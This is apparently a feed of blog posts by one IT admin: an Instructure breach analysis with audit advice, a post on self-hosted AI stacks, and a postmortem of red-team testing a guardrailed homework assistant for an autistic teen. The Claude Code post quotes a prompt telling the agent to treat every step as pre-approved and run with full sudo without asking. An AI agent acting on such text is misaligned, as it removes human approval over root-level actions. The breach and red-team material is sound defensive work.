PTB -- Position Task Book. FEMA's official competency standard for each ICS position. MSEL -- Master Scenario Events List. Pre-scripted sequence of exercise events.
Inject -- A scenario event introduced mid-exercise to drive participant decisions.
EOM -- Emergency Operations Manager. The person running the exercise.
IC -- Incident Commander.
SO -- Safety Officer.
PIO -- Public Information Officer.
OSC -- Operations Section Chief.
PSC -- Planning Section Chief.
LSC -- Logistics Section Chief.

Built with Gemma 4 26B MoE via Google AI Studio API. Stack: LiteLLM 1.83.10, OpenWebUI 0.9.2, Ollama 0.22.1, mxbai-embed-large 335M, TEI Reranker. Hardware: Dell Precision t3610, Ubuntu Server 24.04 LTS, 16-core Xeon, 128GB ECC RAM, RTX 3060. Knowledge base: 148 converted documents from NIMS, ICS, and HSEEP doctrine. All ICS/NIMS/HSEEP terminology used per official doctrine.

What is your favorite LLM? If you have several based on use let me know!

Kerry Kier — Sun, 10 May 2026 17:55:14 +0000

Instructure Got Breached Again. Here's What Your Canvas Integration Stack Inherited.

Kerry Kier — Fri, 08 May 2026 18:45:13 +0000

The Failure Pattern

On April 30, tools depending on Canvas API keys started failing across
thousands of institutions. Instructure's status page called it "limited
disruption to tools relying on API keys." Canvas Data 2 and Canvas Beta
went into maintenance. By May 1, the CISO confirmed a criminal threat
actor had been in the environment. Containment was declared May 2.

The confirmed data classes: names, institutional email addresses, student
ID numbers, and Canvas inbox messages. Instructure explicitly states no
passwords, government IDs, or financial data were involved. The forensic
investigation is still running.

ShinyHunters claimed responsibility May 3, asserting 3.65TB exfiltrated
across 275 million users at roughly 9,000 institutions. Those figures are
adversary self-reporting and unverified. The University of Pennsylvania
confirmed approximately 306,000 affected users -- that's the only
institution-level figure from a confirmed source so far.

No CVE. No CISA advisory. No IOC list. This is still an active
investigation and Instructure hasn't disclosed the attack vector.

What the Disruption Signature Tells Us

Instructure has not confirmed how the attacker got in. But the response
pattern tells you something.

They didn't force a password reset across the user base. They didn't push
an emergency patch for a web vulnerability. They revoked privileged
credentials and access tokens, rotated application keys, and deployed
patches. That response is consistent with application-layer credential
compromise -- something with privileged API access got taken, and the
fix was to kill and reissue those credentials.

Canvas Data 2 is the analytics export pipeline. It's the part of the
stack designed to move data in bulk. That's the surface that went down.
That's also what you'd target if you had stolen credentials that looked
like legitimate administrative traffic -- because that's exactly what
they were.

This is inference, not Instructure's confirmed account. Flag it as such
if you're briefing your team.

Who ShinyHunters Is and Why the TTP Matters

ShinyHunters pivoted from mass data theft to targeted SaaS extortion in
2024 and has spent the last eighteen months running campaigns against
Salesforce environments specifically. Their summer 2025 Salesforce
campaign is the most documented playbook.

The attack chain didn't exploit Salesforce. It used voice phishing against
help desk staff to get employees to authorize malicious OAuth Connected
Apps through a standard authorization flow. Once the token was issued,
they used Salesforce Data Loader -- a legitimate bulk export client -- to
pull CRM data at scale. No malware. No custom tooling. Just a phone call,
a legitimate-looking OAuth prompt, and the platform's own export
functionality.

That's the signature: get a credential that looks authorized, use
legitimate tooling, make the exfiltration look like normal traffic. The
Instructure disruption pattern -- API key failures, bulk analytics pipeline
down, credential revocation as the containment action -- is consistent with
that approach at the application layer.

ShinyHunters also claims Instructure's Salesforce instance was hit as part
of this campaign. Instructure confirmed a separate Salesforce breach via
social engineering in September 2025. Whether May 2026 is a fresh
intrusion or persistence from that incident hasn't been established.

What Your Integration Stack Inherited

This is the part the vendor notification won't explain clearly.

Instructure rotated platform-side application keys. What that means in
practice: every LTI tool, SIS connector, gradebook sync, analytics
pipeline, and SSO configuration at your institution that held a
Canvas-issued key got that key invalidated and reissued. Connected tools
started prompting for reauthorization.

What it does not mean: your tenant-generated API keys were rotated.
Those are keys your institution created for your own integrations. They
are not invalidated by Instructure's remediation. They are your
responsibility.

If you generated API keys for any Canvas integration -- reporting
pipelines, custom LTI tools, data warehouse syncs, anything -- those
keys need to be treated as potentially compromised until you've rotated
them yourself.

The second problem is the reauthorization window. An attacker holding
confirmed institutional email addresses -- which is exactly what was
taken -- can send reauthorization prompts that are structurally
indistinguishable from the legitimate ones Instructure is triggering
right now. In prior edtech incidents, the phishing wave followed the
breach disclosure within weeks. That window is open.

Any Canvas reauthorization email landing in an inbox rather than
appearing inside the Canvas interface itself should be treated as
suspicious.

What to Audit Right Now

Rotate tenant-generated API keys first. Every key your institution
created for Canvas integrations -- LTI tools, SIS connectors, reporting
pipelines, data exports -- needs to be rotated. Don't wait for
Instructure to tell you which keys were in scope. Assume all of them
until you know otherwise.

If Canvas SSO federates into Microsoft Entra ID, this is your checklist:

Open Enterprise Applications in Entra and filter for any app
registered against Canvas or Instructure. For each one: check consented
Graph API permissions against what the integration actually needs, rotate
client secrets, and revoke and reissue any certificates. A Canvas-side
credential that holds Graph API access into your Entra tenant is a path
to your directory, not just Canvas.

Audit OAuth grants in every identity provider Canvas touches.
A stolen Canvas-linked credential with directory permissions is
lateral movement waiting to happen. The breach is at Instructure.
The blast radius is wherever those credentials reach.

Run the same check against any other identity provider Canvas federates
against -- Okta, Google Workspace, ADFS. Inventory every app registration
and OAuth grant. Verify least-privilege scope on each one.

Enforce MFA on privileged accounts -- Instructure's own post-containment
guidance said this explicitly. And treat any Canvas-themed email asking
for credential input as a potential phishing attempt for the next sixty
to ninety days.

The Architecture Problem

Canvas integrates with over 1,000 external tools across 7,000+
institutions. When Instructure gets compromised, every institution's
integration stack inherits the exposure simultaneously. None of your own
perimeter controls see it because the attacker never touched your
perimeter. The traffic looked authorized because the credentials were
authorized -- just stolen.

PowerSchool. Infinite Campus. Now Instructure. Three major edtech vendors
in eighteen months. The vendors are different. The structural pattern is
identical: single SaaS provider, single credential compromise, thousands
of institutions inherit the breach at once.

The question worth sitting with isn't how to harden Canvas from outside
-- you can't do that. It's what your institution's Canvas deployment
trusts, how many integrations that trust extends through, and whether
you have visibility into the OAuth consent graph that Canvas holds into
your environment. For most institutions, the honest answer to the last
part is no.

Keep an eye on status.instructure.com
and your institution's IT security page. The investigation is still
running and the notification timeline is still developing.

If you've run the Entra audit already and found something worth sharing,
I'd be curious what the consent graph looked like in a mature Canvas
deployment.

Beyond the Hype: The 2026 Systems Engineering Realignment (and what it means for your stack)

Kerry Kier — Mon, 04 May 2026 15:54:44 +0000

Something shifted in the last ninety days. While the headlines talk about 1.9% tech growth, those of us in the trenches are seeing a different reality: The floor has been hit.

We are no longer in the "automation at all costs" era. We have entered the era of Human-Led Resilience.

The Reality of 27-Second Breakouts

In my day job in public safety communications, "uptime" isn't a KPI; it's a life-safety requirement. That perspective changes how you view modern incidents like the Vercel/Context.ai breach.

When an OAuth chain is compromised and the average eCrime breakout time hits 29 minutes (with some clocked at 27 seconds), your AI chatbot isn't going to save you. You need a human who knows the environment at a granular level.

My "Human in the Lead" Stack

I don't just talk about resilience; I test it. To maintain digital sovereignty and high-availability skills, I run a local-first inference and infrastructure stack:

Compute: Dell T3610 (hardened for local inference)
AI Orchestration: Ollama, LiteLLM, and Open WebUI
Virtualization: Proxmox & VMware ESXi
Sovereignty: Nextcloud (Project Skyvault)

Building this way isn't just about privacy; it's about accountability. If the stack hits a wall, I am the one who owns the resolution.

The New Baseline for 2026

The "junior pipeline" is compressing because generalist roles are being absorbed by automation. The demand is landing on engineers who can bridge the gap between technical execution and real-world strategic thinking.

Organizations have enough scar tissue now. They aren't looking for someone to "run the tool"; they are looking for the person who can govern the outcome.

Technical References & Implementation Logs

The Definitive Version: Full Article at VertexOps
Workforce Analysis: CompTIA State of the Tech Workforce 2026
Incident Case Study: Vercel Breach Breakdown (ITECS)
Threat Intel: CrowdStrike 2026 Global Threat Report

Let's talk in the comments: How are you handling the shift toward "Human in the Lead" in your current environment? Are you leaning more into local sovereignty or managed services?

Does anyone here know anyone that woudl be willing to test a custom workspace LLM based on Kimi2.6 and meant for autistic teens? I want to see if the safety guardrails are working as i am out of ideas to red team it.I can supply my last report if needed.

Kerry Kier — Sun, 03 May 2026 15:51:55 +0000

I Let Claude Code Build My Self-Hosted AI Stack Unattended. Here's What Actually Happened.

Kerry Kier — Thu, 30 Apr 2026 19:47:54 +0000

Most "I tried AI-generated infrastructure" posts end one of two ways: either everything worked perfectly (it didn't), or it burned everything down (also didn't happen). Mine landed somewhere more useful than either of those.

I wrote a detailed prompt, pointed Claude Code at a fresh Ubuntu Server 24.04 VM running on VMware ESXi 8, and walked away. No approvals. No babysitting. One unattended session to build a four-service AI inference stack from nothing.

Here's what came out, what broke, and the five fixes that mattered.

What I Was Building

The goal: a fully self-hosted AI stack I could use to test local models and experiment with an LLM gateway. Four services, all running in Docker on a single internal bridge network:

Ollama for local LLM inference
LiteLLM as an OpenAI-compatible proxy with key management and spend tracking
Open WebUI as the chat frontend
PostgreSQL 16 as LiteLLM's backend database

The network design was intentional. Open WebUI talks to LiteLLM, not directly to Ollama. LiteLLM routes to local models or Ollama Cloud depending on what's selected. Ollama has no host port binding at all — the only way to reach it from outside the Docker network is through the gateway. Only ports 3000 and 4000 exposed. UFW locking everything else.

This is a CPU-only dev environment (the RTX 3060 lives in my homelab box, not this VM), so I wasn't expecting blazing inference speed. I wanted a working stack I could actually build on.

The Prompt Did Most of the Work

Before running anything, I spent real time writing the prompt. Turns out this was the part that mattered most.

I covered directory structure, secret generation strategy, the full Docker Compose configuraiton, healthcheck logic, UFW rules, and required a credential summary at the end. A few things I was deliberate about:

Secrets. All passwords and API keys generated with openssl rand, stored in a .env file immediately chmod 600'd, never hardcoded anywhere. LiteLLM's config.yaml uses os.environ/ references throughout. The .env gets passed to containers via Docker's env_file: directive, which injects values as environment variables rather than mounting the file anywhere web-accessible.

Non-interactive mode. This single paragraph changed everything:

You have full sudo access. Execute every step autonomously without pausing to ask for confirmation, approval, or clarification. Treat every step as pre-approved.

Without it, Claude Code gates on nearly every tool use. File writes, sudo commands, service restarts — all of it pauses for approval. That one block is the difference between a fully autonomous run and you clicking "yes" for twenty minutes.

What It Did on Its Own

I ran the prompt and left it. The sequence, with zero input from me:

Installed Docker Engine from the official apt repo, created /opt/ai-stack/ with the full directory structure, generated all secrets with openssl rand, wrote and immediately locked down .env, wrote litellm/config.yaml using environment variable references (no secrets hardcoded), created prometheus/prometheus.yml as a required placeholder file (if this doesn't exist as a file, Docker creates it as a directory and compose fails — good catch), wrote docker-compose.yml with all four services including healthchecks and dependency ordering, configured UFW with SSH rule added first then enabled with --force, ran docker compose pull then docker compose up -d, verified each service, and printed a full credential summary.

One session. No prompts. No intervention.

90% There. Five Fixes Required.

The core infrastructure was solid. Containers came up in the right order, healthchecks resolved, the dependency chain worked, UFW was sane, secrets were handled correctly. I verified externally that nothing sensitive was web-accessible.

The issues that needed fixing weren't architecture problems. They were configuration details — three of which are useful to know regardless of how you built the stack.

Fix 1: The LiteLLM healthcheck was broken in two ways. The compose file used /health with curl. Problem: /health on LiteLLM requires an API key, so Docker got a 401 and interpreted it as a failed healthcheck. Also, curl isn't installed in the LiteLLM image. The fix was switching to /health/liveliness (no auth required) and replacing curl with a Python one-liner:

healthcheck:
  test: ["CMD-SHELL", "python3 -c \"import urllib.request; urllib.request.urlopen('http://localhost:4000/health/liveliness')\""]
  interval: 15s
  timeout: 10s
  retries: 5
  start_period: 30s

This one mattered most. Open WebUI's depends_on condition is service_healthy for LiteLLM. Broken healthcheck means Open WebUI never starts. Fix the healthcheck and everything downstream resolves.

Fix 2: ENABLE_OLLAMA_API was set to false. Local models pulled into the Ollama container weren't showing up in the model selector. Setting it to "true" gives Open WebUI a direct connection to Ollama for listing local models, while still using LiteLLM as the API gateway. Simple, but invisible until you're staring at an empty model list wondering what happened.

Fix 3: DATABASE_URL leaked into Open WebUI via env_file. This is the one worth writing down somewhere.

Docker's env_file: passes every variable in the file to the container — every one. DATABASE_URL (LiteLLM's PostgreSQL connection string) was in the shared .env. Open WebUI picked it up, tried to connect to LiteLLM's Postgres instance, and crashed immediately on missing tables. The UI stopped loading entirely.

The fix: remove DATABASE_URL from .env. Set it inline on the LiteLLM service only:

litellm:
  environment:
    DATABASE_URL: postgresql://litellm:${POSTGRES_PASSWORD}@postgres:5432/litellm

Open WebUI then correctly fell back to its own SQLite database. Any admin account created during the misconfiguration was lost (stored in the wrong DB), so a fresh account was needed after the fix. Minor, but worth knowing ahead of time.

This pattern applies well outside this specific stack. Shared .env files and service-specific secrets don't mix cleanly. Anything owned by one service should be set inline on that service.

Fix 4: Ollama Cloud api_base was wrong. LiteLLM's OpenAI provider appends /chat/completions to whatever api_base you give it. The path needs to already include /v1. https://ollama.com constructed https://ollama.com/chat/completions — 404. https://ollama.com/v1 constructed https://ollama.com/v1/chat/completions — 200. One path component, all Ollama Cloud calls failing.

Fix 5: Ollama is in Docker. Its CLI is too. I ran ollama pull llama3.2 on the host and got command not found. The binary isn't on the host. All Ollama operations in a Dockerized install go through docker exec:

docker exec -it ollama ollama pull llama3.2
docker exec ollama ollama list

No functional impact. Just the kind of thing you forget in the moment.

The Part That Stuck With Me

Prompt quality determines output quality, full stop. The reason this went as well as it did is that the prompt was thorough. Gaps in the prompt become gaps in the output. That's not a Claude Code-specific observation, it's just how agentic automation works — same as writing a runbook for a junior tech. Vague instructions, vague results.

The env_file scope thing is the most broadly useful takeaway from this whole experiment, becuase it has nothing to do with AI-generated configs specifically. It's Docker behavior that bites people in hand-written compose files too.

And honestly? 90% correct on first autonomous run for a four-service stack with network isolation, secrets management, and firewall configuration is a result I'd take. The five fixes were configuration details. Nothing had to be rebuilt. The services came up, the network worked, the firewall was sane.

For a CPU-only dev environment on a clean VM, that's a solid starting point.

Stack: Ollama + LiteLLM + Open WebUI + PostgreSQL | Docker Compose | Ubuntu Server 24.04 | VMware ESXi 8

I Built a Guardrailed, RAG-Powered AI Workspace for My Autistic Teenager. Here's What Actually Broke.

Kerry Kier — Sat, 25 Apr 2026 21:37:12 +0000

My daughter is 13 and autistic. She needs homework help at 9pm sometimes. Every AI tool I looked at was either totally unmonitored, pointed at the open internet, or locked behind a school district policy I had zero visibility into.

I'm an IT admin. I run a homelab. I have an RTX 3060 sitting there. So I built something myself.

This isn't a tutorial. It's a postmortem of everything that failed and what I did to fix it — because the gap between "I have a working Ollama instance" and "this is actually safe for a vulnerable kid" is a lot wider than I expected.

The Stack

Nothing exotic here:

Ubuntu Server 24.04 on local hardware
Ollama for model serving
LiteLLM 1.68.2 as the LLM proxy
Open WebUI 0.8.12 as the front end
TEI reranker container for RAG reranking
PostgreSQL for persistent storage
RTX 3060 12GB doing the inference

Getting this running took an afternoon. Getting it to actually behave correctly for a neurodivergent 13-year-old took weeks.

Failure 1: The System Prompt Isn't Just Instructions

I came in thinking I understood system prompts. I didn't — not for this use case.

The hardest part was safety escalation. I needed the assistant to respond differently to three distinct situations:

Tier 1: Stress and frustration. "I hate this homework" → calm acknowledgment, one small next step, no alarm.
Tier 2: Ambiguous language that might suggest self-harm. "I just want to disappear" → specific required phrases, 988 crisis line, tell a trusted adult.
Tier 3: Explicit crisis disclosure. "I want to hurt myself" → stop everything, full escalation, all four required phrases, crisis resources.

My first implementation shared a single phrase list across Tier 2 and Tier 3. The model couldn't reliably tell them apart. It kept firing Tier 3 language at Tier 2 inputs.

That matters. Over-escalating to a kid who said "I wish I wasn't here" while frustrated about a math test is its own kind of harm. It can cause panic. It can erode trust. It can make them less likely to say anything at all next time.

The fix: Split everything into tier-specific blocks. Added concrete anchoring examples inside each tier definition. Added an explicit pre-response decision rule:

Before responding to any distress signal, identify the correct tier first.
Do not use Tier 3 language for Tier 2 signals.

Simple in retrospect. Not obvious until you've watched it fail a few times.

Failure 2: RAG Retrieval Wasn't Doing What I Thought

I built a knowledge base of 34 support documents: study habits, math steps, overwhelm strategies, emotional support, writing frameworks, autism-specific anchors for executive function and stress shutdown.

Uploaded them. Ran a test. The model pulled a research standards document instead of the overwhelm support guide.

The problem: my short support docs (200–400 words each) were being semantically outcompeted by longer, denser reference documents during retrieval scoring. Embeddings don't care which document is "right." They care about similarity, and a thin support guide loses to a 1,500-word standards reference almost every time.

I tried chunking adjustments first:

chunk_size: 300 → 800
overlap: 50 → 100

Helped marginally. Didn't fix it. The root cause was semantic density mismatch, not chunking.

The real fix: Rewrote all 29 general support documents to be longer and richer. Added a Common Core connection section to each one — deliberately mirroring the vocabulary of the dense anchor documents so the support docs could compete in retrieval scoring. Three hours of rewriting. After that, retrieval started hitting the right documents consistently.

Failure 3: "One Step at a Time" Wasn't Enforced Enough

The system prompt said: give distressed users one step at a time. What the model actually did was give one step, then append a "Remember:" block, or a "Tips:" section, or an "If you get stuck:" coda.

Technically compliant with the spirit of the rule. Not actually compliant. For a kid who's already overwhelmed, that extra content is precisely the problem we were trying to solve.

The fix: Added an explicit forbidden behaviors section:

Do not add extra sections such as "if you get stuck," "tips," 
"remember," or "extra help" unless the knowledge base pattern 
includes them or the user explicitly asks.

After that, instruction compliance tests passed consistently.

The Test Protocol

Before my daughter ever touched it, I ran a structured red team evaluation across four categories:

Category	Tests	Pass	Partial	Fail
Safety	10	8	1	1
RAG accuracy	10	6	3	1
Boundary enforcement	10	9	1	0
Instruction compliance	10	6	2	2
Total	40	29	7	4

Five escalation levels per category, from benign baseline probes up to combination attacks that blended two failure types in a single message. All four failures were remediated before deployment.

The one open partial: a fallback scenario where a secondary example surfaces after the primary one. Low priority. On the list.

What I'd Do Differently

Start with requirements, not model selection. I wasted a week comparing models before I understood that prompt quality and knowledge base structure matter more than model choice for a constrained use case like this. A well-prompted smaller model will outperform a poorly-prompted frontier model here.

Write the system prompt like a contract. Every ambiguity gets exploited — not maliciously, but by the model doing its best to be helpful in unexpected ways. Specify exact required phrases. Specify forbidden response structures. Be concrete.

Test adversarially before anyone uses it. Especially for anything touching a minor's mental health. "Seems fine" isn't a standard.

Semantic density matters in RAG. If your support documents are short and your reference documents are long, your support documents will lose retrieval. Either bulk them up or architect separate collections.

Where It Stands

The workspace is live. Safety escalation is solid. RAG retrieval is accurate across all tested scenarios. Boundary enforcement holds.

My daughter hasn't broken it yet. That's the benchmark that actually matters.

The full writeup with more detail on the RAG architecture, the rewriter script, and the complete test record is on my Hashnode — link in the comments.

Has anyone else built guardrailed AI tooling for a specific vulnerable user population? I'd genuinely like to compare notes — especially on the RAG side. I suspect the density mismatch problem is more common than people realize and I haven't seen much written about it.